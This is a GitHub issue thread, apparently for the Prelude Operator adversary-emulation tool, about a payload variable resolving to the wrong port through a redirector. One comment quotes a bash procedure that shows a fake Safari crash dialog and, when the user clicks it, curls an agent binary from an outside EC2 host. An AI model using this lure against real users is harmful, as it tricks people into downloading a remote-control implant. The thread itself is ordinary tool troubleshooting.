### ISSUE TITLE
Payload Variable is being pulled from wrong port through redirector

### ISSUE THREAD

**Issue by bwhack16** [preludeorg/operator-support#405]
When running a procedure, the #{operator.payloads} variable is translating with the port 33303.

![image](https://user-images.githubusercontent.com/42819634/143132473-450c950d-6ab5-4485-86a6-294273197f02.png)

**Comment by privateducky** [comment]
@lzimm how could this actually happen do you think?

**Comment by khyberspache** [comment]
I get random payloads too:
```
[bash]function downloadPayload() {
    curl 'http://ec2-184-73-139-18.compute-1.amazonaws.com:42515/payloads/pneuma/pneuma-darwin' -o ~/Downloads/pneuma-darwin;
}
osascript -e 'display dialog "Safari Web Content quit unexpectedly. Click report to see more detailed information and send a report to Apple." buttons {"Ignore", "Report..."} cancel button "Ignore" with icon caution' 2>/dev/null 1>&2 && downloadPayload;
while [ $? -ne 0 ]; do
  osascript -e 'display dialog "Safari Web Content quit unexpectedly. Click report to see more detailed information and send a report to Apple." buttons {"Ignore", "Report..."} cancel button "Ignore" with icon caution' 2>/dev/null 1>&2 && downloadPayload;
done
```

**Comment by privateducky** [comment]
@lzimm we've still got some work to incorporate this change into Connect - but 1.3.3 is resolved for now, right?

**Comment by khyberspache** [comment]
@privateducky confirming this is resolved by:
1. Readding Switchboard binary as option (instead of headless)
2. small patch to Connect plugin

**Comment by khyberspache** [comment]
leaving open in case you want to track it

**Comment by privateducky** [comment]
awesome; I'll close this one down in that case. we'll be circling back on this in the coming weeks, to ensure Headless can handle the payloads appropriately. thanks for the confirmation.
